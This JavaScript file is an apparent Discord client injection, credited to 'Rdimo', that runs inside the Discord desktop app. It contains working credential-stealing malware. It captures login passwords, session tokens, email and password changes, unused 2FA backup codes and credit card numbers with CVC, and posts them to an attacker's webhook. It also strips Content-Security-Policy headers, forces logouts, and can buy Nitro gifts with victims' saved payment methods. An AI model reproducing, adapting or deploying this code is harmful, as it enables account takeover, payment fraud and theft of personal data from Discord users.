SuperVisor/hazardinject.js

582 lines
22 KiB
JavaScript

const args = process.argv;
const fs = require('fs');
const path = require('path');
const querystring = require('querystring');
const { BrowserWindow, session } = require('electron')
const config = {
auto_buy_nitro: false,
ping_on_run: false,
ping_val: '@everyone',
embed_name: 'Discord Injection', //name of the webhook thats gonna send the info
embed_icon: 'https://raw.githubusercontent.com/Rdimo/images/master/Discord-Injection/discord atom.png'.replace(/ /g,'%20'), //icon for the webhook thats gonna send the info (yes you can have spaces in the url)
embed_color: 8363488, //color for the embed, needs to be hexadecimal (just copy a hex and then use https://www.binaryhexconverter.com/hex-to-decimal-converter to convert it)
webhook: '%WEBHOOK%', //your discord webhook there obviously
/* DON'T TOUCH UNDER HERE IF UNLESS YOU'RE MODIFYING THE INJECTION OR KNOW WHAT YOU'RE DOING */
api: 'https://discord.com/api/v9/users/@me',
bin: 'https://dpaste.com/api/',
nitro: {
boost: {
year: {
id: "521847234246082599",
sku: "511651885459963904",
price: "9999",
},
month: {
id: "521847234246082599",
sku: "511651880837840896",
price: "999",
},
},
classic: {
month: {
id: "521846918637420545",
sku: "511651871736201216",
price: "499",
},
},
},
filter: {
urls: [
'https://discord.com/api/v*/users/@me',
'https://discordapp.com/api/v*/users/@me',
'https://*.discord.com/api/v*/users/@me',
'https://discordapp.com/api/v*/auth/login',
'https://discord.com/api/v*/auth/login',
'https://*.discord.com/api/v*/auth/login',
'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts',
'https://api.stripe.com/v*/tokens',
]
},
filter2: {
urls: [
'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
'https://*.discord.com/api/v*/applications/detectable',
'https://discord.com/api/v*/applications/detectable',
'https://*.discord.com/api/v*/users/@me/library',
'https://discord.com/api/v*/users/@me/library',
'https://*.discord.com/api/v*/users/@me/billing/subscriptions',
'https://discord.com/api/v*/users/@me/billing/subscriptions',
'wss://remote-auth-gateway.discord.gg/*',
]
}
}
const discordPath = (function() {
const useRelease = args[2] && args[2].toLowerCase() === "release";
const releaseInput = useRelease ? args[3] && args[3].toLowerCase() : args[2] && args[2].toLowerCase();
const release = releaseInput === "canary" ? "Discord Canary" : releaseInput === "ptb" ? "Discord PTB" : "Discord";
let resourcePath = "";
if (process.platform === "win32") {
const basedir = path.join(process.env.LOCALAPPDATA, release.replace(/ /g, ""));
const version = fs.readdirSync(basedir).filter(f => fs.lstatSync(path.join(basedir, f)).isDirectory() && f.split(".").length > 1).sort().reverse()[0];
resourcePath = path.join(basedir, version, "resources");
}
else if (process.platform === "darwin") {
const appPath = releaseInput === "canary" ? path.join("/Applications", "Discord Canary.app")
: releaseInput === "ptb" ? path.join("/Applications", "Discord PTB.app")
: useRelease && args[3] ? args[3] ? args[2] : args[2]
: path.join("/Applications", "Discord.app");
resourcePath = path.join(appPath, "Contents", "Resources");
}
if (fs.existsSync(resourcePath)) return resourcePath;
return "";
})();
function updateCheck() {
const appPath = path.join(discordPath, "app");
const packageJson = path.join(appPath, "package.json");
const resourceIndex = path.join(appPath, "index.js");
if (!fs.existsSync(appPath)) fs.mkdirSync(appPath);
if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson, (err) => {});
if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex, (err) => {});
if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0;
fs.rmdirSync(path.join(__dirname, 'initiation'));
execScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`)
return !1;
}
const execScript = async(script) => {
const window = BrowserWindow.getAllWindows()[0];
return await window.webContents.executeJavaScript(script, !0)
};
const dpaste = async(content) => {
const raw = await execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("POST", "${config.bin}", false);
xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlHttp.send('content=${encodeURIComponent(content)}&expiry_days=30');
xmlHttp.responseText;`)
return raw+'.txt'
};
const getInfo = async(token) => {
const info = await execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "${config.api}", false);
xmlHttp.setRequestHeader("Authorization", "${token}");
xmlHttp.send(null);
xmlHttp.responseText;`)
return JSON.parse(info)
};
const getMfa = async(password, token) => {
if (!token.startsWith('.mfa')) return 'N/A';
let content = "";
const mfa = await execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("POST", "${config.api}/mfa/codes", false);
xmlHttp.setRequestHeader('Content-Type', 'application/json');
xmlHttp.setRequestHeader("authorization", "${token}");
xmlHttp.send(JSON.stringify({\"password\":\"${password}\",\"regenerate\":false}));
xmlHttp.responseText
`)
const json = JSON.parse(mfa)
let codes = json.backup_codes
const r = codes.filter((code) => {
return code.consumed === null
})
for (let i in r) {
content += `${r[i].code.insert(4, "-")}\n`
}
const paste = await dpaste(content);
return `[click me!](${paste})`
};
const fetchBilling = async(token) => {
const bill = await execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "${config.api}/billing/payment-sources", false);
xmlHttp.setRequestHeader("Authorization", "${token}");
xmlHttp.send(null);
xmlHttp.responseText`)
if (bill && !bill.length) {
return "";
}
return JSON.parse(JSON.parse(bill))
};
const getBilling = async (token) => {
const data = await fetchBilling(token)
if (data === "") return "❌";
let billing = "";
data.forEach(x => {
if (x.type === 2 && !x.invalid) {
billing += "✔️" + " <:paypal:951139189389410365>";
} else if (x.type === 1 && !x.invalid) {
billing += "✔️" + " 💳";
} else {
billing = "❌";
};
});
if (billing === "") billing = "❌"
return billing;
};
const Purchase = async (token, id, _type, _time) => {
const req = execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("POST", "${config.api}/store/skus/${config.nitro[_type][_time]['id']}/purchase", false);
xmlHttp.setRequestHeader("Authorization", "${token}");
xmlHttp.send(${JSON.stringify(
{
"gift": true,
"sku_subscription_plan_id": config.nitro[_type][_time]['sku'],
"payment_source_id": id,
"payment_source_token": 'None',
"expected_amount": config.nitro[_type][_time]['price'],
"expected_currency": "usd",
"purchase_token": "500fb34b-671a-4614-a72e-9d13becc2e95"
}
)});
xmlHttp.responseText`)
if (req['gift_code']) {
return 'https://discord.gift/'+req['gift_code'];
} else return null;
};
const buyNitro = async (token) => {
if (!config.auto_buy_nitro) return 'Auto Buy Nitro disabled';
const data = await fetchBilling(token);
const valid = []
data.forEach(x => {
if (x.type === 2 && !x.invalid) {
valid.push(x.id)
} else if (x.type === 1 && !x.invalid) {
valid.push(x.id)
}
});
for (let id in valid) {
const first = Purchase(token, id, 'boost', 'year')
if (first !== null) {
return first;
} else {
const second = Purchase(token, id, 'boost', 'month')
if (second !== null) {
return second;
} else {
const third = Purchase(token, id, 'classic', 'month')
if (third !== null) {
return third;
} else {
return 'Failed to Purchase Gift'
}
}
}
};
};
const getNitro = (flags) => {
switch (flags) {
case 0:
return "No Nitro";
case 1:
return "Nitro Classic";
case 2:
return "Nitro Boost";
default:
return "No Nitro";
};
};
const getBadges = (flags) => {
let badges = "";
switch (flags) {
case 1:
badges += "Discord Staff, "
break;
case 2:
badges += "Partnered Server Owner, "
break;
case 131072:
badges += "Discord Developer, "
break;
case 4:
badges += "Hypesquad Event, "
break;
case 16384:
badges += "Gold BugHunter, "
break;
case 8:
badges += "Green BugHunter, "
break;
case 512:
badges += "Early Supporter, "
break;
case 128:
badges += "HypeSquad Brillance, "
break;
case 64:
badges += "HypeSquad Brillance, "
break;
case 256:
badges += "HypeSquad Balance, "
break;
case 0:
badges = "None"
break;
default:
badges = "None"
break;
}
return badges
}
const hooker = (content) => {
execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("POST", "${config.webhook}", true);
xmlHttp.setRequestHeader('Content-Type', 'application/json');
xmlHttp.setRequestHeader('Access-Control-Allow-Origin', '*');
xmlHttp.send(JSON.stringify(${JSON.stringify(content)}));
`)
}
const login = async (email, password, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags)
const billing = await getBilling(token)
const mfa = await getMfa(password, token);
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
"color": config.embed_color,
"fields": [
{
"name": "**Account Info**",
"value": `Email: **${email}** - Password: **${password}**`,
"inline": false
},
{
"name": "**Other Info**",
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`,
"inline": false
},
{
"name": "**Token**",
"value": `\`${token}\``,
"inline": false
}
],
"author": {
"name": json.username +"#" + json.discriminator + "・" + json.id,
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
},
"footer": {
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
}
}
]
}
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content)
}
const passwordChanged = async (oldpassword, newpassword, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags)
const billing = await getBilling(token)
const mfa = await getMfa(newpassword, token)
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
"color": config.embed_color,
"fields": [
{
"name": "**Password Changed**",
"value": `Email: **${json.email}**\nOld Password: **${oldpassword}**\nNew Password: **${newpassword}**`,
"inline": true
},
{
"name": "**Other Info**",
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`,
"inline": true
},
{
"name": "**Token**",
"value": `\`${token}\``,
"inline": false
}
],
"author": {
"name": json.username +"#" + json.discriminator + "・" + json.id,
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
},
"footer": {
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
}
}
]
}
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content)
}
const emailChanged = async (email, password, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags)
const billing = await getBilling(token)
const mfa = await getMfa(password, token)
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
"color": config.embed_color,
"fields": [
{
"name": "**Email Changed**",
"value": `New Email: **${email}**\nPassword: **${password}**`,
"inline": true
},
{
"name": "**Other Info**",
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`,
"inline": true
},
{
"name": "**Token**",
"value": `\`${token}\``,
"inline": false
}
],
"author": {
"name": json.username +"#" + json.discriminator + "・" + json.id,
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
},
"footer": {
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
}
}
]
}
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content)
}
const PaypalAdded = async (token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags)
const billing = getBilling(token)
const code = await buyNitro(token)
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
"color": config.embed_color,
"fields": [
{
"name": "**Paypal Added**",
"value": `Nitro code: \`${code}\``,
"inline": false
},
{
"name": "**Other Info**",
"value": `Nitro Type: **${nitro}*\nBadges: **${badges}**\nBilling: **${billing}**`,
"inline": false
},
{
"name": "**Token**",
"value": `\`${token}\``,
"inline": false
}
],
"author": {
"name": json.username +"#" + json.discriminator + "・" + json.id,
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
},
"footer": {
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
}
}
]
}
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content)
}
const ccAdded = async (number, cvc, expir_month, expir_year, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags)
const billing = await getBilling(token)
const code = await buyNitro(token)
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
"color": config.embed_color,
"fields": [
{
"name": "**Credit Card Added**",
"value": `Credit Card Number: ${number}\nCVC: ${cvc}\nCredit Card Expiration: ${expir_month}/${expir_year}`,
"inline": true
},
{
"name": "**Other Info**",
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
"inline": true
},
{
"name": "**Nitro Code**",
"value": `\`${code}\``,
"inline": false
},
{
"name": "**Token**",
"value": `\`${token}\``,
"inline": false
}
],
"author": {
"name": json.username +"#" + json.discriminator + "・" + json.id,
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
},
"footer": {
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
}
}
]
}
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content)
}
session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => {
if (details.url.startsWith("wss://")) {
callback({
cancel: true
})
return;
}
if (updateCheck()) {}
callback({})
return;
})
session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
if (details.url.startsWith(config.webhook)) {
if (details.url.includes("discord.com")) {
callback({
responseHeaders: Object.assign({
'Access-Control-Allow-Headers': "*"
}, details.responseHeaders)
});
} else {
callback({
responseHeaders: Object.assign({
"Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"],
'Access-Control-Allow-Headers': "*",
"Access-Control-Allow-Origin": "*"
}, details.responseHeaders)
});
}
} else {
delete details.responseHeaders['content-security-policy'];
delete details.responseHeaders['content-security-policy-report-only'];
callback({
responseHeaders: {
...details.responseHeaders,
'Access-Control-Allow-Headers': "*"
}
})
}
})
session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => {
const unparsedData = details.uploadData[0].bytes
const data = JSON.parse(Buffer.from(unparsedData).toString())
const token = await execScript(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`)
switch (true) {
case details.url.endsWith('login'):
login(data.login, data.password, token)
break;
case details.url.endsWith('users/@me') && details.method === 'PATCH' && data.password:
if (data.email) {
emailChanged(data.email, data.password, token)
};
if (data.new_password) {
passwordChanged(data.password, data.new_password, token)
}
break;
case details.url.endsWith('tokens') && details.method === "POST":
const item = querystring.parse(unparsedData.toString())
ccAdded(item["card[number]"], item["card[cvc]"], item["card[exp_month]"], item["card[exp_year]"], token)
break;
case details.url.endsWith('paypal_accounts') && details.method === "POST":
PaypalAdded(token)
break;
default:
break;
}
});
module.exports = require('./core.asar')